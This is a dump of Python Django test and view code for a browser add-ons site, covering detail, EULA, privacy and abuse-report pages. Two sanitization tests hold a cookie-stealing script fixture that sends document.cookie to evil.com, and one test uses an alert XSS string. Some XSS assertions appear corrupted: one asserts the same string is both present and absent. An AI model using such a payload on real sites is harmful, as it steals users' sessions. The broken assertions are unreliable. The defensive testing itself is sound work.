@amo.tests.mobile_test
def test_unreviewed_disabled_button(self):
self.addon.update(status=amo.STATUS_UNREVIEWED)
r = self.client.get(self.url)
doc = pq(r.content)
eq_(doc('.button.add').length, 1)
eq_(doc('.button.disabled').length, 0)
def test_type_redirect(self):
"""
If current add-on's type is unsupported by app, redirect to an
app that supports it.
"""
# Thunderbird can't do search engines
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = amo.THUNDERBIRD.short
response = self.client.get(reverse('addons.detail', args=['a4594']),
follow=False)
eq_(response.status_code, 301)
eq_(response['Location'].find(amo.THUNDERBIRD.short), -1)
assert (response['Location'].find(amo.FIREFOX.short) >= 0)
def test_compatible_app_redirect(self):
"""
For add-ons incompatible with the current app, redirect to one
that's supported.
"""
comp_app = self.addon.compatible_apps.keys()[0]
not_comp_app = [a for a in amo.APP_USAGE
if a not in self.addon.compatible_apps.keys()][0]
# no SeaMonkey version => redirect
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = not_comp_app.short
r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
eq_(r.status_code, 301)
eq_(r['Location'].find(not_comp_app.short), -1)
assert r['Location'].find(comp_app.short) >= 0
# compatible app => 200
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = comp_app.short
r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
eq_(r.status_code, 200)
def test_external_urls(self):
"""Check that external URLs are properly escaped."""
response = self.client.get(self.url)
doc = pq(response.content)
eq_(doc('aside a.home[href^="%s"]' % settings.REDIRECT_URL).length, 1)
def test_no_privacy_policy(self):
"""Make sure privacy policy is not shown when not present."""
self.addon.privacy_policy_id = None
self.addon.save()
response = self.client.get(self.url)
doc = pq(response.content)
eq_(doc('.privacy-policy').length, 0)
def test_privacy_policy(self):
self.addon.privacy_policy = 'foo bar'
self.addon.save()
response = self.client.get(self.url)
doc = pq(response.content)
eq_(doc('.privacy-policy').length, 1)
privacy_url = reverse('addons.privacy', args=[self.addon.slug])
assert doc('.privacy-policy').attr('href').endswith(privacy_url)
def test_simple_html_is_rendered_in_privacy(self):
self.addon.privacy_policy = """
<strong> what the hell..</strong>
<ul>
<li>papparapara</li>
<li>todotodotodo</li>
</ul>
<ol>
<a href="irc://irc.mozilla.org/firefox">firefox</a>
Introduce yourself to the community, if you like!
This text will appear publicly on your user info page.
<li>papparapara2</li>
<li>todotodotodo2</li>
</ol>
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
eq_(norm(doc(".policy-statement strong")),
"<strong> what the hell..</strong>")
eq_(norm(doc(".policy-statement ul")),
"<ul><li>papparapara</li><li>todotodotodo</li></ul>")
eq_(doc(".policy-statement ol a").text(),
"firefox")
eq_(norm(doc(".policy-statement ol li:first")),
"<li>papparapara2</li>")
def test_evil_html_is_not_rendered_in_privacy(self):
self.addon.privacy_policy = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
policy = str(doc(".policy-statement"))
assert policy.startswith(
'<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[0:50])
def test_button_size(self):
"""Make sure install buttons on the detail page are prominent."""
response = self.client.get(reverse('addons.detail', args=['a3615']),
follow=True)
assert pq(response.content)('.button').hasClass('prominent')
def test_button_src_default(self):
r = self.client.get(self.url, follow=True)
eq_((pq(r.content)('#addon .button').attr('href')
.endswith('?src=dp-btn-primary')), True)
def test_button_src_trickle(self):
r = self.client.get(self.url + '?src=trickleortreat', follow=True)
eq_((pq(r.content)('#addon .button').attr('href')
.endswith('?src=trickleortreat')), True)
def test_version_button_src_default(self):
r = self.client.get(self.url, follow=True)
eq_((pq(r.content)('#detail-relnotes .button').attr('href')
.endswith('?src=dp-btn-version')), True)
def test_version_button_src_trickle(self):
r = self.client.get(self.url + '?src=trickleortreat', follow=True)
eq_((pq(r.content)('#detail-relnotes .button').attr('href')
.endswith('?src=trickleortreat')), True)
def test_invalid_version(self):
"""Only render details pages for add-ons that have a version."""
# Wipe all versions.
self.addon.versions.all().delete()
# Try accessing the details page.
response = self.client.get(self.url)
eq_(response.status_code, 404)
def test_no_listed_authors(self):
r = self.client.get(reverse('addons.detail', args=['a59']))
# We shouldn't show an avatar since this has no listed_authors.
doc = pq(r.content)
eq_(0, len(doc('.avatar')))
def test_authors_xss(self):
name = '<script>alert(1)</script>'
user = UserProfile.objects.create(username='test',
display_name=name)
output = users_list([user])
assert "<script>alert" in output
assert "<script>alert" not in output
def test_display_compatible_apps(self):
"""Show compatiblity info for extensions but not for search engines."""
r = self.client.get(self.addon.get_url_path())
eq_(pq(r.content)('#detail-relnotes .compat').length, 1)
a = Addon.objects.filter(type=amo.ADDON_SEARCH)[0]
r = self.client.get(a.get_url_path())
eq_(pq(r.content)('#detail-relnotes .compat').length, 0)
def test_show_profile(self):
selector = '.author a[href="%s"]' % self.addon.meet_the_dev_url()
assert not (self.addon.the_reason or self.addon.the_future)
assert not pq(self.client.get(self.url).content)(selector)
self.addon.the_reason = self.addon.the_future = '...'
self.addon.save()
assert pq(self.client.get(self.url).content)(selector)
def test_no_backup(self):
res = self.client.get(self.url)
eq_(len(pq(res.content)('.backup-button')), 0)
def test_backup(self):
self.addon._backup_version = self.addon.versions.all()[0]
self.addon.save()
res = self.client.get(self.url)
eq_(len(pq(res.content)('.backup-button')), 1)
def test_disabled_user_message(self):
self.addon.update(disabled_by_user=True)
res = self.client.get(self.url)
eq_(res.status_code, 404)
assert 'removed by its author' in res.content
def test_disabled_status_message(self):
self.addon.update(status=amo.STATUS_DISABLED)
res = self.client.get(self.url)
eq_(res.status_code, 404)
assert 'disabled by an administrator' in res.content
def test_deleted_status_message(self):
addon = Addon.objects.get(id=3615)
addon.update(status=amo.STATUS_DELETED)
url = reverse('addons.detail', args=[addon.slug])
res = self.client.get(url)
eq_(res.status_code, 404)
def test_more_url(self):
response = self.client.get(self.url)
eq_(pq(response.content)('#more-webpage').attr('data-more-url'),
self.addon.get_url_path(more=True))
class TestImpalaDetailPage(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/addon_592', 'base/apps', 'base/users']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.url = self.addon.get_url_path()
self.more_url = self.addon.get_url_path(more=True)
def get_pq(self):
return pq(self.client.get(self.url).content)
def test_no_webapps(self):
self.addon.update(type=amo.ADDON_WEBAPP)
eq_(self.client.get(self.url).status_code, 404)
def test_adu_stats_private(self):
eq_(self.addon.public_stats, False)
adu = self.get_pq()('#daily-users')
eq_(adu.length, 1)
def test_adu_stats_public(self):
self.addon.update(public_stats=True)
eq_(self.addon.show_adu(), True)
adu = self.get_pq()('#daily-users')
# Check formatted count.
eq_(adu.text().split()[0], numberfmt(self.addon.average_daily_users))
# Check if we hide link when there are no ADU.
self.addon.update(average_daily_users=0)
eq_(self.get_pq()('#daily-users').length, 0)
def test_adu_stats_regular(self):
self.client.login(username='[email protected]', password='password')
# Should not be a link to statistics dashboard for regular users.
adu = self.get_pq()('#daily-users')
eq_(adu.length, 1)
def test_downloads_stats_private(self):
self.addon.update(type=amo.ADDON_SEARCH)
eq_(self.addon.public_stats, False)
adu = self.get_pq()('#weekly-downloads')
eq_(adu.length, 1)
def test_downloads_stats_public(self):
self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
eq_(self.addon.show_adu(), False)
dls = self.get_pq()('#weekly-downloads')
# Check formatted count.
eq_(dls.text().split()[0], numberfmt(self.addon.weekly_downloads))
# Check if we hide link when there are no weekly downloads.
self.addon.update(weekly_downloads=0)
eq_(self.get_pq()('#weekly-downloads').length, 0)
def test_downloads_stats_regular(self):
self.addon.update(type=amo.ADDON_SEARCH)
self.client.login(username='[email protected]', password='password')
# Should not be a link to statistics dashboard for regular users.
dls = self.get_pq()('#weekly-downloads')
eq_(dls.length, 1)
def test_downloads_stats_admin(self):
self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
self.client.login(username='[email protected]', password='password')
def test_license_link_builtin(self):
g = 'http://google.com'
version = self.addon._current_version
license = version.license
license.builtin = 1
license.name = 'License to Kill'
license.url = g
license.save()
eq_(license.builtin, 1)
eq_(license.url, g)
a = self.get_pq()('.secondary.metadata .source-license a')
eq_(a.attr('href'), g)
eq_(a.attr('target'), '_blank')
eq_(a.text(), 'License to Kill')
def test_license_link_custom(self):
version = self.addon._current_version
eq_(version.license.url, None)
a = self.get_pq()('.secondary.metadata .source-license a')
eq_(a.attr('href'), version.license_url())
eq_(a.attr('target'), None)
eq_(a.text(), 'Custom License')
def get_more_pq(self):
return pq(self.client.get_ajax(self.more_url).content)
def test_other_addons(self):
"""Ensure listed add-ons by the same author show up."""
other = Addon.objects.get(id=592)
eq_(list(Addon.objects.listed(amo.FIREFOX).exclude(id=self.addon.id)),
[other])
add_addon_author(other, self.addon)
doc = self.get_more_pq()('#author-addons')
test_hovercards(self, doc, [other], src='dp-dl-othersby')
def test_other_addons_no_unlisted(self):
"""An unlisted add-on by the same author should not show up."""
other = Addon.objects.get(id=592)
other.update(status=amo.STATUS_UNREVIEWED, disabled_by_user=True)
add_addon_author(other, self.addon)
eq_(self.get_more_pq()('#author-addons').length, 0)
def test_other_addons_by_others(self):
"""Add-ons by different authors should not show up."""
author = UserProfile.objects.get(pk=999)
AddonUser.objects.create(addon=self.addon, user=author, listed=True)
eq_(self.get_more_pq()('#author-addons').length, 0)
def test_other_addons_none(self):
eq_(self.get_more_pq()('#author-addons').length, 0)
def test_categories(self):
c = self.addon.all_categories[0]
c.application_id = amo.THUNDERBIRD.id
c.save()
links = self.get_more_pq()('#related ul:first').find('a')
expected = [(unicode(c.name), c.get_url_path()) for c in
self.addon.categories.filter(application=amo.FIREFOX.id)]
amo.tests.check_links(expected, links)
class TestStatus(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.version = self.addon.current_version
self.file = self.version.all_files[0]
assert self.addon.status == amo.STATUS_PUBLIC
self.url = self.addon.get_url_path()
def test_incomplete(self):
self.addon.update(status=amo.STATUS_NULL)
eq_(self.client.get(self.url).status_code, 404)
def test_unreviewed(self):
self.addon.update(status=amo.STATUS_UNREVIEWED)
eq_(self.client.get(self.url).status_code, 200)
def test_pending(self):
self.addon.update(status=amo.STATUS_PENDING)
eq_(self.client.get(self.url).status_code, 404)
def test_nominated(self):
self.addon.update(status=amo.STATUS_NOMINATED)
eq_(self.client.get(self.url).status_code, 200)
def test_public(self):
self.addon.update(status=amo.STATUS_PUBLIC)
eq_(self.client.get(self.url).status_code, 200)
def test_deleted(self):
self.addon.update(status=amo.STATUS_DELETED)
eq_(self.client.get(self.url).status_code, 404)
def test_disabled(self):
self.addon.update(status=amo.STATUS_DISABLED)
eq_(self.client.get(self.url).status_code, 404)
def test_lite(self):
self.addon.update(status=amo.STATUS_LITE)
eq_(self.client.get(self.url).status_code, 200)
def test_lite_and_nominated(self):
self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
eq_(self.client.get(self.url).status_code, 200)
def test_purgatory(self):
self.addon.update(status=amo.STATUS_PURGATORY)
eq_(self.client.get(self.url).status_code, 200)
def test_disabled_by_user(self):
self.addon.update(disabled_by_user=True)
eq_(self.client.get(self.url).status_code, 404)
def new_version(self, status):
v = Version.objects.create(addon=self.addon)
File.objects.create(version=v, status=status)
return v
def test_public_new_lite_version(self):
self.new_version(amo.STATUS_LITE)
eq_(self.addon.get_version(), self.version)
def test_public_new_nominated_version(self):
self.new_version(amo.STATUS_NOMINATED)
eq_(self.addon.get_version(), self.version)
def test_public_new_public_version(self):
v = self.new_version(amo.STATUS_PUBLIC)
eq_(self.addon.get_version(), v)
def test_public_waiting_new_unreviewed_version(self):
self.file.update(status=amo.STATUS_PUBLIC_WAITING)
self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
new_version = self.new_version(amo.STATUS_UNREVIEWED)
assert self.version != new_version
eq_(self.addon.get_version(), self.version)
eq_(self.addon.latest_version, new_version)
def test_public_new_public_waiting_version(self):
new_version = self.new_version(amo.STATUS_PUBLIC_WAITING)
assert self.version != new_version
eq_(self.addon.get_version(), self.version)
eq_(self.addon.latest_version, new_version)
def test_public_new_unreviewed_version(self):
self.new_version(amo.STATUS_UNREVIEWED)
eq_(self.addon.get_version(), self.version)
def test_lite_new_unreviewed_version(self):
self.addon.update(status=amo.STATUS_LITE)
self.new_version(amo.STATUS_UNREVIEWED)
eq_(self.addon.get_version(), self.version)
def test_lite_new_lan_version(self):
self.addon.update(status=amo.STATUS_LITE)
v = self.new_version(amo.STATUS_LITE_AND_NOMINATED)
eq_(self.addon.get_version(), v)
def test_lite_new_lite_version(self):
self.addon.update(status=amo.STATUS_LITE)
v = self.new_version(amo.STATUS_LITE)
eq_(self.addon.get_version(), v)
def test_lite_new_full_version(self):
self.addon.update(status=amo.STATUS_LITE)
v = self.new_version(amo.STATUS_PUBLIC)
eq_(self.addon.get_version(), v)
def test_lan_new_lite_version(self):
self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
v = self.new_version(amo.STATUS_LITE)
eq_(self.addon.get_version(), v)
def test_lan_new_full_version(self):
self.addon.update(status=amo.STATUS_LITE_AND_NOMINATED)
v = self.new_version(amo.STATUS_PUBLIC)
eq_(self.addon.get_version(), v)
class TestTagsBox(amo.tests.TestCase):
fixtures = ['base/addontag']
def test_tag_box(self):
"""Verify that we don't show duplicate tags."""
r = self.client.get_ajax(reverse('addons.detail_more', args=[8680]),
follow=True)
doc = pq(r.content)
eq_('SEO', doc('#tagbox ul').children().text())
class TestEulaPolicyRedirects(amo.tests.TestCase):
def test_eula_legacy_url(self):
"""
See that we get a 301 to the zamboni style URL
"""
response = self.client.get('/en-US/firefox/addons/policy/0/592/42')
eq_(response.status_code, 301)
assert (response['Location'].find('/addon/592/eula/42') != -1)
def test_policy_legacy_url(self):
"""
See that we get a 301 to the zamboni style URL
"""
response = self.client.get('/en-US/firefox/addons/policy/0/592/')
eq_(response.status_code, 301)
assert (response['Location'].find('/addon/592/privacy/') != -1)
class TestEula(amo.tests.TestCase):
fixtures = ['base/apps', 'addons/eula+contrib-addon']
def setUp(self):
self.addon = Addon.objects.get(id=11730)
self.url = self.get_url()
def get_url(self, args=[]):
return reverse('addons.eula', args=[self.addon.slug] + args)
def test_current_version(self):
r = self.client.get(self.url)
eq_(r.context['version'], self.addon.current_version)
def test_simple_html_is_rendered(self):
self.addon.eula = """
<strong> what the hell..</strong>
<ul>
<li>papparapara</li>
<li>todotodotodo</li>
</ul>
<ol>
<a href="irc://irc.mozilla.org/firefox">firefox</a>
Introduce yourself to the community, if you like!
This text will appear publicly on your user info page.
<li>papparapara2</li>
<li>todotodotodo2</li>
</ol>
"""
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
eq_(norm(doc('.policy-statement strong')),
'<strong> what the hell..</strong>')
eq_(norm(doc('.policy-statement ul')),
'<ul><li>papparapara</li><li>todotodotodo</li></ul>')
eq_(doc('.policy-statement ol a').text(), 'firefox')
eq_(norm(doc('.policy-statement ol li:first')),
'<li>papparapara2</li>')
def test_evil_html_is_not_rendered(self):
self.addon.eula = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
policy = str(doc('.policy-statement'))
assert policy.startswith('<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[:50])
def test_old_version(self):
old = self.addon.versions.order_by('created')[0]
assert old != self.addon.current_version
r = self.client.get(self.get_url([old.all_files[0].id]))
eq_(r.context['version'], old)
def test_redirect_no_eula(self):
self.addon.update(eula=None)
r = self.client.get(self.url, follow=True)
self.assertRedirects(r, self.addon.get_url_path())
def test_cat_sidebar(self):
check_cat_sidebar(self.url, self.addon)
class TestPrivacyPolicy(amo.tests.TestCase):
fixtures = ['base/apps', 'addons/eula+contrib-addon']
def setUp(self):
self.addon = Addon.objects.get(id=11730)
self.url = reverse('addons.privacy', args=[self.addon.slug])
def test_redirect_no_eula(self):
eq_(self.addon.privacy_policy, None)
r = self.client.get(self.url, follow=True)
self.assertRedirects(r, self.addon.get_url_path())
def test_cat_sidebar(self):
self.addon.privacy_policy = 'shizzle'
self.addon.save()
check_cat_sidebar(self.url, self.addon)
class TestReportAbuse(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
settings.RECAPTCHA_PRIVATE_KEY = 'something'
self.full_page = reverse('addons.abuse', args=['a3615'])
@patch('captcha.fields.ReCaptchaField.clean')
def test_abuse_anonymous(self, clean):
clean.return_value = ""
self.client.post(self.full_page, {'text': 'spammy'})
eq_(len(mail.outbox), 1)
assert 'spammy' in mail.outbox[0].body
report = AbuseReport.objects.get(addon=3615)
eq_(report.message, 'spammy')
eq_(report.reporter, None)
def test_abuse_anonymous_fails(self):
r = self.client.post(self.full_page, {'text': 'spammy'})
assert 'recaptcha' in r.context['abuse_form'].errors
def test_abuse_logged_in(self):
self.client.login(username='[email protected]', password='password')
self.client.post(self.full_page, {'text': 'spammy'})
eq_(len(mail.outbox), 1)
assert 'spammy' in mail.outbox[0].body
report = AbuseReport.objects.get(addon=3615)
eq_(report.message, 'spammy')
eq_(report.reporter.email, '[email protected]')
def test_abuse_name(self):
addon = Addon.objects.get(pk=3615)
addon.name = 'Bmrk.ru Социальные закладки'
addon.save()
self.client.login(username='[email protected]', password='password')
self.client.post(self.full_page, {'text': 'spammy'})
assert 'spammy' in mail.outbox[0].body
assert AbuseReport.objects.get(addon=addon)
class TestMobile(amo.tests.MobileTest, amo.tests.TestCase):
fixtures = ['addons/featured', 'base/apps', 'base/users',
'base/addon_3615', 'base/featured']
class TestMobileHome(TestMobile):
def test_addons(self):
# Uncomment when redis gets fixed in CI.
raise SkipTest
r = self.client.get('/', follow=True)
eq_(r.status_code, 200)
app, lang = r.context['APP'], r.context['LANG']
featured, popular = r.context['featured'], r.context['popular']
eq_(len(featured), 3)
assert all(a.is_featured(app, lang) for a in featured)
eq_(len(popular), 3)
eq_([a.id for a in popular],
[a.id for a in sorted(popular, key=lambda x: x.average_daily_users,
reverse=True)])
class TestMobileDetails(TestMobile):
fixtures = TestMobile.fixtures + ['base/featured', 'base/users']
def setUp(self):
super(TestMobileDetails, self).setUp()
self.ext = Addon.objects.get(id=3615)
self.url = reverse('addons.detail', args=[self.ext.slug])
def test_extension(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
self.assertTemplateUsed(r, 'addons/mobile/details.html')
def test_extension_adu(self):
doc = pq(self.client.get(self.url).content)('table')
eq_(doc('.adu td').text(), numberfmt(self.ext.average_daily_users))
self.ext.update(average_daily_users=0)
doc = pq(self.client.get(self.url).content)('table')
eq_(doc('.adu').length, 0)
def test_extension_downloads(self):
doc = pq(self.client.get(self.url).content)('table')
eq_(doc('.downloads td').text(), numberfmt(self.ext.weekly_downloads))
self.ext.update(weekly_downloads=0)
doc = pq(self.client.get(self.url).content)('table')
eq_(doc('.downloads').length, 0)
def test_button_caching(self):
"""The button popups should be cached for a long time."""
# Get the url from a real page so it includes the build id.
client = test.Client()
doc = pq(client.get('/', follow=True).content)
js_url = absolutify(reverse('addons.buttons.js'))
url_with_build = doc('script[src^="%s"]' % js_url).attr('src')
response = client.get(url_with_build, follow=True)
fmt = '%a, %d %b %Y %H:%M:%S GMT'
expires = datetime.strptime(response['Expires'], fmt)
assert (expires - datetime.now()).days >= 365
def test_unicode_redirect(self):
url = '/en-US/firefox/addon/2848?xx=\xc2\xbcwhscheck\xc2\xbe'
response = test.Client().get(url)
eq_(response.status_code, 301)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import redirect
from . import views
ADDON_ID = r"""(?P<addon_id>[^/<>"']+)"""
# These will all start with /addon/<addon_id>/
detail_patterns = patterns('',
url('^$', views.addon_detail, name='addons.detail'),
url('^more$', views.addon_detail, name='addons.detail_more'),
url('^eula/(?P<file_id>\d+)?$', views.eula, name='addons.eula'),
url('^license/(?P<version>[^/]+)?', views.license, name='addons.license'),
url('^privacy/', views.privacy, name='addons.privacy'),
url('^abuse/', views.report_abuse, name='addons.abuse'),
url('^developers$', views.developers,
{'page': 'developers'}, name='addons.meet'),
url('^contribute/roadblock/', views.developers,
{'page': 'roadblock'}, name='addons.roadblock'),
url('^contribute/installed/', views.developers,
{'page': 'installed'}, name='addons.installed'),
url('^contribute/thanks',
csrf_exempt(lambda r, addon_id: redirect('addons.detail', addon_id)),
name='addons.thanks'),
url('^about$', lambda r, addon_id: redirect('addons.installed',
addon_id, permanent=True),
name='addons.about'),
)
urlpatterns = patterns('',
# URLs for a single add-on.
('^addon/%s/' % ADDON_ID, include(detail_patterns)),
# Accept extra junk at the end for a cache-busting build id.
url('^addons/buttons.js(?:/.+)?$', 'addons.buttons.js'),
# For happy install button debugging.
url('^addons/smorgasbord$', 'addons.buttons.smorgasbord'),
# Remora EULA and Privacy policy URLS
('^addons/policy/0/(?P<addon_id>\d+)/(?P<file_id>\d+)',
lambda r, addon_id, file_id: redirect('addons.eula',
addon_id, file_id, permanent=True)),
('^addons/policy/0/(?P<addon_id>\d+)/',
lambda r, addon_id: redirect('addons.privacy',
addon_id, permanent=True)),
)
########NEW FILE########
__FILENAME__ = utils
import hashlib
import logging
import random
from django.db.models import Q
from django.utils.encoding import smart_str
import commonware.log
from cache_nuggets.lib import memoize
import amo
safe_key = lambda x: hashlib.md5(smart_str(x).lower().strip()).hexdigest()
log = commonware.log.getLogger('z.redis')
rnlog = logging.getLogger('z.rn')
def reverse_name_lookup(key, webapp=False):
from addons.models import Addon
addon_type = 'app' if webapp else 'addon'
qs = Addon.objects.filter(name__localized_string=key).no_cache()
if webapp:
qs = qs.filter(type=amo.ADDON_WEBAPP)
else:
qs = qs.exclude(type=amo.ADDON_WEBAPP)
values = list(qs.distinct().values_list('id', flat=True))
if values:
if len(values) > 1:
rnlog.warning('Multiple returned for [%s:%s]: %s' % (addon_type,
key, values))
return values[0]
return None # Explicitly return None for no results
@memoize('addons:featured', time=60 * 10)
def get_featured_ids(app, lang=None, type=None):
from addons.models import Addon
ids = []
is_featured = (Q(collections__featuredcollection__isnull=False) &
Q(collections__featuredcollection__application__id=app.id))
qs = Addon.objects.all()
if type:
qs = qs.filter(type=type)
if lang:
has_locale = qs.filter(
is_featured &
Q(collections__featuredcollection__locale__iexact=lang))
if has_locale.exists():
ids += list(has_locale.distinct().values_list('id', flat=True))
none_qs = qs.filter(
is_featured &
Q(collections__featuredcollection__locale__isnull=True))
blank_qs = qs.filter(is_featured &
Q(collections__featuredcollection__locale=''))
qs = none_qs | blank_qs
else:
qs = qs.filter(is_featured)
other_ids = list(qs.distinct().values_list('id', flat=True))
random.shuffle(ids)
random.shuffle(other_ids)
ids += other_ids
return map(int, ids)
########NEW FILE########
__FILENAME__ = views
import functools
from django import http
from django.shortcuts import (get_list_or_404, get_object_or_404, redirect,
render)
from django.views.decorators.vary import vary_on_headers
import commonware.log
import session_csrf
from mobility.decorators import mobilized
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from abuse.models import send_abuse_report
from amo import messages, urlresolvers
from amo.forms import AbuseForm
from amo.models import manual_order
from amo.urlresolvers import reverse
from reviews.models import Review
from translations.query import order_by_translation
from versions.models import Version
from .decorators import addon_view_factory
from .models import Addon
log = commonware.log.getLogger('z.addons')
addon_view = addon_view_factory(qs=Addon.objects.valid)
addon_unreviewed_view = addon_view_factory(qs=Addon.objects.unreviewed)
addon_disabled_view = addon_view_factory(qs=Addon.objects.valid_and_disabled)
def author_addon_clicked(f):
"""Decorator redirecting clicks on "Other add-ons by author"."""
@functools.wraps(f)
def decorated(request, *args, **kwargs):
redirect_id = request.GET.get('addons-author-addons-select', None)
if not redirect_id:
return f(request, *args, **kwargs)
try:
target_id = int(redirect_id)
return http.HttpResponsePermanentRedirect(reverse(
'addons.detail', args=[target_id]))
except ValueError:
return http.HttpResponseBadRequest('Invalid add-on ID.')
return decorated
@addon_disabled_view
def addon_detail(request, addon):
"""Add-ons details page dispatcher."""
if addon.is_deleted:
raise http.Http404
if addon.is_disabled:
return render(request, 'addons/impala/disabled.html',
{'addon': addon}, status=404)
if addon.is_webapp():
# Apps don't deserve AMO detail pages.
raise http.Http404
# addon needs to have a version and be valid for this app.
if addon.type in request.APP.types:
if not addon.current_version:
raise http.Http404
return extension_detail(request, addon)
else:
# Redirect to an app that supports this type.
try:
new_app = [a for a in amo.APP_USAGE if addon.type
in a.types][0]
except IndexError:
raise http.Http404
else:
prefixer = urlresolvers.get_url_prefix()
prefixer.app = new_app.short
return http.HttpResponsePermanentRedirect(reverse(
'addons.detail', args=[addon.slug]))
@vary_on_headers('X-Requested-With')
def extension_detail(request, addon):
"""Extensions details page."""
# If current version is incompatible with this app, redirect.
comp_apps = addon.compatible_apps
if comp_apps and request.APP not in comp_apps:
prefixer = urlresolvers.get_url_prefix()
prefixer.app = comp_apps.keys()[0].short
return redirect('addons.detail', addon.slug, permanent=True)
# Addon recommendations.
recommended = Addon.objects.listed(request.APP).filter(
recommended_for__addon=addon)[:6]
ctx = {
'addon': addon,
'src': request.GET.get('src', 'dp-btn-primary'),
'version_src': request.GET.get('src', 'dp-btn-version'),
'tags': addon.tags.not_blacklisted(),
'recommendations': recommended,
'reviews': Review.objects.valid().filter(addon=addon, is_latest=True),
'get_replies': Review.get_replies,
'abuse_form': AbuseForm(request=request),
}
# details.html just returns the top half of the page for speed. The bottom
# does a lot more queries we don't want on the initial page load.
if request.is_ajax():
# Other add-ons/apps from the same author(s).
ctx['author_addons'] = addon.authors_other_addons(app=request.APP)[:6]
return render(request, 'addons/impala/details-more.html', ctx)
else:
if addon.is_webapp():
ctx['search_placeholder'] = 'apps'
return render(request, 'addons/impala/details.html', ctx)
@mobilized(extension_detail)
def extension_detail(request, addon):
return render(request, 'addons/mobile/details.html', {'addon': addon})
class BaseFilter(object):
"""
Filters help generate querysets for add-on listings.
You have to define ``opts`` on the subclass as a sequence of (key, title)
pairs. The key is used in GET parameters and the title can be used in the
view.
The chosen filter field is combined with the ``base`` queryset using
the ``key`` found in request.GET. ``default`` should be a key in ``opts``
that's used if nothing good is found in request.GET.
"""
def __init__(self, request, base, key, default, model=Addon):
self.opts_dict = dict(self.opts)
self.extras_dict = dict(self.extras) if hasattr(self, 'extras') else {}
self.request = request
self.base_queryset = base
self.key = key
self.model = model
self.field, self.title = self.options(self.request, key, default)
self.qs = self.filter(self.field)
def options(self, request, key, default):
"""Get the (option, title) pair we want according to the request."""
if key in request.GET and (request.GET[key] in self.opts_dict or
request.GET[key] in self.extras_dict):
opt = request.GET[key]
else:
opt = default
if opt in self.opts_dict:
title = self.opts_dict[opt]
else:
title = self.extras_dict[opt]
return opt, title
def all(self):
"""Get a full mapping of {option: queryset}."""
return dict((field, self.filter(field)) for field in dict(self.opts))
def filter(self, field):
"""Get the queryset for the given field."""
filter = self._filter(field) & self.base_queryset
order = getattr(self, 'order_%s' % field, None)
if order:
return order(filter)
return filter
def _filter(self, field):
return getattr(self, 'filter_%s' % field)()
def filter_featured(self):
ids = self.model.featured_random(self.request.APP, self.request.LANG)
return manual_order(self.model.objects, ids, 'addons.id')
def filter_price(self):
return self.model.objects.order_by('addonpremium__price__price', 'id')
def filter_free(self):
if self.model == Addon:
return self.model.objects.top_free(self.request.APP, listed=False)
else:
return self.model.objects.top_free(listed=False)
def filter_paid(self):
if self.model == Addon:
return self.model.objects.top_paid(self.request.APP, listed=False)
else:
return self.model.objects.top_paid(listed=False)
def filter_popular(self):
return (self.model.objects.order_by('-weekly_downloads')
.with_index(addons='downloads_type_idx'))
def filter_downloads(self):
return self.filter_popular()
def filter_users(self):
return (self.model.objects.order_by('-average_daily_users')
.with_index(addons='adus_type_idx'))
def filter_created(self):
return (self.model.objects.order_by('-created')
.with_index(addons='created_type_idx'))
def filter_updated(self):
return (self.model.objects.order_by('-last_updated')
.with_index(addons='last_updated_type_idx'))
def filter_rating(self):
return (self.model.objects.order_by('-bayesian_rating')
.with_index(addons='rating_type_idx'))
def filter_hotness(self):
return self.model.objects.order_by('-hotness')
def filter_name(self):
return order_by_translation(self.model.objects.all(), 'name')
class ESBaseFilter(BaseFilter):
"""BaseFilter that uses elasticsearch."""
def __init__(self, request, base, key, default):
super(ESBaseFilter, self).__init__(request, base, key, default)
def filter(self, field):
sorts = {'name': 'name_sort',
'created': '-created',
'updated': '-last_updated',
'popular': '-weekly_downloads',
'users': '-average_daily_users',
'rating': '-bayesian_rating'}
return self.base_queryset.order_by(sorts[field])
class HomepageFilter(BaseFilter):
opts = (('featured', _lazy(u'Featured')),
('popular', _lazy(u'Popular')),
('new', _lazy(u'Recently Added')),
('updated', _lazy(u'Recently Updated')))
filter_new = BaseFilter.filter_created
# Define a placeholder home response until we can hunt down all the places
# it is called from and remove them.
def home(request):
return http.HttpResponse('home')
@addon_view
def eula(request, addon, file_id=None):
if not addon.eula:
return http.HttpResponseRedirect(addon.get_url_path())
if file_id:
version = get_object_or_404(addon.versions, files__id=file_id)
else:
version = addon.current_version
return render(request, 'addons/eula.html',
{'addon': addon, 'version': version})
@addon_view
def privacy(request, addon):
if not addon.privacy_policy:
return http.HttpResponseRedirect(addon.get_url_path())
return render(request, 'addons/privacy.html', {'addon': addon})
@addon_view
def developers(request, addon, page):
if 'version' in request.GET:
qs = addon.versions.filter(files__status__in=amo.VALID_STATUSES)
version = get_list_or_404(qs, version=request.GET['version'])[0]
else:
version = addon.current_version
if 'src' in request.GET:
contribution_src = src = request.GET['src']
else:
